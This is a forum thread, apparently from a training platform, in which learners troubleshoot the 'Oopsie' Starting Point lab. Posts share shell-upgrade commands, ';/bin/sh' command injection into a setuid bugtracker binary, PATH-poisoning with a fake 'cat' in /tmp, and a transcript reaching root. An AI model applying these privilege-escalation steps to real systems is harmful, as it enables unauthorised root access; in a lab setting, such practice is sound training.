Oopsie Machine - Starting Point

I’m struggling to fully understand the shell upgrade code i.e.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

I get that SHELL sets the users shell, but it seems to be running “script” and sending the output to null. From googling it seems that script is a kind of command recorder - unclear how his helps! Then I assume the Ctrl-Z is meant to background something (breaks the nc connection for me). stty switches off echoing, ok not sure how this helps.

reset and xterm resets the terminal session.

So I kinda get the individual commands, but can anyone explain how this works as a whole?
Thanks

is anyone else having an issue even getting a result from scans in startpoint…

Type your comment> @DaChef said:

There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

I appreciate your answer bro, may i know wht made this code "export PATH=.:$PATH
echo ‘/bin/sh’ > cat
chmod +x ./cat,"not work in the first place

Type your comment> @Ja4V8s28Ck said:

Type your comment> @DaChef said:

There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

I appreciate your answer bro, may i know wht made this code "export PATH=.:$PATH
echo ‘/bin/sh’ > cat
chmod +x ./cat,"not work in the first place

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo “/bin/sh” > cat
chmod +x cat
export PATH=/tmp:$PATH

The dot referencing on your current directory is wrong, you need to specify the exact path!

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo “/bin/sh” > cat
chmod +x cat
export PATH=/tmp:$PATH

@DaChef /tmp or any directory in which your current user has privileges to write.

post removed - posted in wrong thread

Type your comment> @phamilton said:

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo “/bin/sh” > cat
chmod +x cat
export PATH=/tmp:$PATH

@DaChef /tmp or any directory in which your current user has privileges to write.

This worked from me. Thanks smiley:

Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

Right now bugtracker doesn’t have the setuid bit set, so the cat shell just gives you normal permission. Something to check if you are running everything else right and it just doesn’t work.

robert@oopsie:/tmp$ /usr/bin/bugtracker

: EV Bug Tracker :

Provide Bug ID: 1

$ whoami
robert
$ ls -al /usr/bin/bugtracker
-rwxr-xr-x 1 root root 8792 Apr 16 02:56 /usr/bin/bugtracker

However bugtracker.save still has the setuid bit so that can work:
$ ls -al /usr/bin/bugtracker.save
-rwsr-xr-x 1 root bugtracker 8792 Jan 25 10:14 /usr/bin/bugtracker.save
$ /usr/bin/bugtracker.save

: EV Bug Tracker :

Provide Bug ID: 1

whoami

root

I am able to do that but when do cat /root/root.txt nothing happens

Never mind found it

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that r̶u̶n̶n̶i̶n̶g̶ misusing locate wasn’t turning anything up. You’ll find what you need if you keep looking.

Type your comment> @stevebytheway said:

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that running locate wasn’t turning anything up. You’ll find what you need if you keep looking.

Hey Steve yes I found it with the linux find command in the end: find / -name *.txt

I am in netcat and logged in as www-data
www-data@oopsie:
When I try to sudo robert im getting sorry try again?
I am using the password from the db.php file.
A I missing something?

@ritorix How did you get into the robert user account? when I attempt su robert and enter the password from the db.php file, it gives me “su: Authentication failure”

Looks like someone may have changed the password? I tried the same process today and it worked!

Type your comment> @kp22cfc said:

I am able to do that but when do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

@Jade86 said:
Type your comment> @kp22cfc said:

I am able to do that but when do cat /root/root.txt nothing happens

Never mind found it

how did you manage?? I can’t seem to be able to cat?!

ah ok. got it, sorry lol

OK. Noob here. I got all the way to the end and it looks like I did everything right. I run /usr/bin/bugtracker and get the correct output but I still don’t have access to anything. i.e. /root. I’ve gone through the walkthrough many times for over 16 hours and I get the same result. Any advice?

Hi guys, need help… script below is not working for me.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

this is what happening
www-data@oopsie:/$ SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xtermSHELL=/bin/bash script -q /dev/null
www-data@oopsie:/$ Ctrl-Z
Ctrl-Z: command not found
www-data@oopsie:/$ stty raw -echo
www-data@oopsie:/$ bash: fg: current: no such job
www-data@oopsie:/$ reset: unknown terminal type unknown
Terminal type?

help me understand what is happening here?